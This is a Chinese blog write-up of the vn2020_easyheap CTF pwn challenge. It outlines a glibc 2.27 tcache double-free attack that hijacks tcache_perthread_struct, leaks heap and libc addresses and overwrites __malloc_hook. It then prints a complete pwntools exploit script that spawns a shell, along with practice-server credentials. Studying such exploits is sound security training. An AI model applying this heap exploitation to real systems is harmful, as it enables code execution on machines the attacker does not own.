【BUU】vn2020_easyheap

最新推荐文章于 2021-07-07 20:38:18 发布
最新推荐文章于 2021-07-07 20:38:18 发布
阅读量84 收藏
点赞数
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43960998/article/details/115490551
版权
控制 tcache_perthread_struct
利用思路

tcache 直接泄漏堆地址劫持 tcache_perthread_struct,修改 counts,接下来 free 进入 unsorted bin 泄漏 libc 地址,继续修改 entry 字段到 realoc,配合 realloc 调节栈帧 getshell。

完整exp
# -*- coding: utf-8 -*-
import sys
import os
import binascii
from pwn import *
from ctypes import *
context.log_level = 'debug'

binary = './vn_pwn_easyTHeap_1'
elf = ELF('./vn_pwn_easyTHeap_1')
libc = elf.libc
# libc = cdll.LoadLibrary("./libc.so.6")
context.binary = binary

# shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=28387, password='guest')

DEBUG = 0
if (DEBUG == 0):
	p = process(binary)
elif (DEBUG == 1):
	host = "node2.hackingfor.fun"
	port =  39964 
	p = remote(host,port)
else :
	host = "node3.buuoj.cn"
	port = 28387
	user = "CTFMan"
	passwd = "guest"
	p = ssh(host,port,user,passwd)

def dbg():
    gdb.attach(p)
    pause()

l64 = lambda      :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda      :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
se      = lambda data               :p.send(data) 
sa      = lambda delim,data         :p.sendafter(delim, data)
sl      = lambda data               :p.sendline(data)
sla     = lambda delim,data         :p.sendlineafter(delim, data)
rc      = lambda num          		:p.recv(num)
rl      = lambda                    :p.recvline()
ru      = lambda delims             :p.recvuntil(delims)
info    = lambda tag, addr          :log.info(tag + " -> " + hex(addr))
ia		= lambda                    :p.interactive()

menu = "choice: "

def cmd(i):
	ru(menu)
	sl(str(i))

def add(size):
	cmd(1)
	sla("size?", str(size))

def edit(idx,content):
	cmd(2)
	sla("idx?", str(idx))
	sa("content:", content)

def show(idx):
	cmd(3)
	sla("idx?", str(idx))

def dele(idx):
	cmd(4)
	sla("idx?", str(idx))

add(0x90)
add(0x90)

dele(0)
dele(0)

show(0)
heap_base = u64(p.recv(6).ljust(8, '\x00')) - 0x260
info("heap_base", heap_base)

add(0x90) #2
edit(2, p64(heap_base + 0x10))
add(0x90) #3
add(0x90) #4

edit(4, p64(0x0707070707070707)*2)
dele(3)
show(3)
libc_base = l64() - libc.sym['__malloc_hook'] - 0x70
info("libc_base", libc_base)
malloc_hook = libc_base + libc.sym['__malloc_hook']
system_addr = libc_base + libc.sym['system']
realloc_addr = libc_base + libc.sym['__libc_realloc']
og = libc_base + 0xdeed2

edit(4, p64(0)*16 + p64(malloc_hook-8))
add(0x90) #5
edit(5, p64(og) + p64(realloc_addr + 8))

# dbg()
'''
0x41612 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x41666 execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xdeed2 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
cmd(1)
sla("size?", str(0x10))
ia()
、皮皮鸭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
2020网鼎杯青龙组Boom
05-12
【标题】"2020网鼎杯青龙组Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙组"可能是比赛中的一个分组或者阶段,可能...
vn_pwn_easyTHeap(堆利用+劫持IO_2_1_stdout的虚表)
seaaseesa的博客
04-09 1310
vn_pwn_easyTHeap 首先,已知libc版本为2.27,所以存在tcache机制,并且可以随意的double free tcache bin的chunk。 然后,我们检查一下程序的保护机制 然后,我们用IDA分析一下程序 存在UAF漏洞,因此可以double free,对于glibc 2.27,可以很轻松的利用 主函数里,对调用功能的次数做了限制,即add功能能...
[BUUCTF]PWN——[V&N2020 公开赛]easyTHeap
mcmuyanga的博客
01-04 292
[V&N2020 公开赛]easyTHeap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,常见的堆的菜单 64位ida载入,main函数 最多只能申请7个chunk,delete只能执行3次 add() add函数只能创建一个chunk,不能读入数据,读入数据需要用到edit函数 edit() show() delete() 这题的libc是2.27,在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 812
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
cipher_CIPHER_
09-29
标题中的"Cipher_CIPHER_"可能指的是密码学中的加密算法或安全协议,这在IT行业中是非常重要的一环,特别是在数据传输、网络安全以及信息安全存储等领域。"Hi3520D"则可能是一个芯片型号,通常用于处理视频编码、...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
2020年网鼎杯青龙组赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
【pwn】orw
weixin_43960998的博客
06-19 1750
本文分为两部分,一部分是2.27及一下的 setcontext + orw,一部分是 2.29 及以上的 setcontext + orw。 利用条件 2.27: 开了沙箱 uaf 等控制 free_hook 一、2.27 libc 2.27及以下的 setcontext: 给各寄存器传参分别由 rdi 来完成,一般的套路是线泄漏 libc 和 heap_base,我们把某一个 chunk 填充为: frame = SigreturnFrame() frame.rsp = libc.sym['__fr
【攻防世界】greeting-150
weixin_43960998的博客
03-28 1299
1.程序逆向 main 函数非常简单,存在一个只能利用一次的格式化字符串。 自定义 getnline 函数: 存在一个奇怪的函数,提供了 system,但是没用 /bin/sh : 2.前置知识 当程序中的漏洞只能利用一次,但是我们需要利用多次时,可以考虑修改 .fini_array,这里引用了参考文章的图: (图源 https://bbs.ichunqiu.com/thread-43624-1-1.html) 程序退出后会依次 .fini_array 中的每一个函数指针,那如果把 start 或者
【攻防世界】Recho
weixin_43960998的博客
03-28 666
1.程序逆向 简单,略 2.漏洞利用 这道题想了半天,没想明白怎么退出循环,所以看了 ha1vk 师傅博客,学习了一波。 退出循环主要是利用 pwntools 提供的一个功能:shutdown。这个功能可以关闭流,这样就可以退出循环了。     因为对于有些系统,system 可以用系统调用,但是有些不行,所以这里采用 orw 的方式读取 flag。 shift + f12 可以看到 flag 字符串,所以也可能是提示我们。 题目中有了 read,write 可以使用
【glibc2.29】新增保护机制
weixin_43960998的博客
02-17 537
新增防护机制 1、free 1.1、tcache 通过注释可以看到新增的 key 是为了检测 double free 的。 e->key=tcache,这个 tcache 就是: 也就是 tcache_perthread_struct 的地址,在调试中也就是这里: 即: 循环遍历 tcache 链表上所有的 chunk 进行对比,所以 tcache 的 double free 挂了。但是由于 tcache 的特性,他的利用还是要比其他 bins 方便很多。 绕过方式:根据上图,只有当key和t
【笔记】pwn模板
weixin_43960998的博客
02-21 504
今天在一个师傅博客中学到了一种当本地 libc 和远程 libc 不一样,调试和 getshell 之间需要切换的情况下,这种模板就会很简单。拿过来结合自己之前用的如下: from pwn import * import sys context.log_level = "debug" elf = ELF("./pwn") if sys.argv[1] == "process": p = process("./pwn") libc = ELF("/lib/x86_64-linux-gnu/li
【kernel pwn】(壹)初探
weixin_43960998的博客
03-18 503
1.环境搭建 只需要安装一个qemu就好了: sudo apt-get install qemu 2.准备工作 一般kernel题目会给一些文件,分别是boot.sh,bzImage,rootfs.cpio,分别是启动脚本,内核映像,根文件系统映像。题中所给的 rootfs.cpio 一般先是一个压缩包,需要重命名后解压出真正的文件目录,这里参考 cnitlrt师傅的文章给出一些常用脚本: 首先是解包脚本: #!/bin/bash mv $1 $1.gz unar $1.gz mv $1 core mv
BUU】n1ctf2018_null
weixin_43960998的博客
04-12 492
struct malloc_state { /* Serialize access. */ __libc_lock_define (, mutex); /* Flags (formerly in max_fast). */ int flags; /* Set if the fastbin chunks contain recently inserted free blocks. */ /* Note this is a bool but not all targets su
【pwn】2019Byte ctf 复现
weixin_43960998的博客
07-07 463
1、mulnote 看 wp 说加了 ollvm 混淆,不过影响不大, 存在 uaf,libc 2.23,double free 梭了。 from pwn import * import sys binary = "./pwn" context.log_level = "debug" context.binary = binary context.arch = "amd64" elf = ELF(binary) local = 1 if local: p = process(binary)
【攻防世界】secret_file
weixin_43960998的博客
03-28 457
1.程序逆向 感觉这题的绝大部分难度在逆向上,可以逆个大概然后动调就ok了。 刚一看到有点懵,直接看看让干什么:     最终需要我们满足 v15 和 v17 的值相等。     往前找看看 v15 和 v17 分别是什么。通过在栈中的关系看到,v15 在第一个函数里面进行了赋了一个 hash 值: 此后再也没变过。再看 v17: DD0函数做了一个 SHA256,结果应该是存放在了 v16 中, 然后把结果的每个字符转
【tw】Bookwriter
weixin_43960998的博客
03-08 436
程序&初步分析 程序会先向 bss 段中读取 0x40 字节的 author 信息: 存放 chunk ptr 和 size 的列表在其正下方: 看 add 功能中: chunk_list 只有可以存放 8 个指针大小的内存,而 add 中 if 的判断条件显然可以多申请一个 chunk,而 size_list 紧随其后,可以溢出到此处。然后就是正常的读入数据。 view 功能正常,可以利用其泄漏 libc。 edit 功能存在一处漏洞: 这里首先通过先前存放的 size 进行读入数据,然
buu cipher
最新发布
10-23
Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值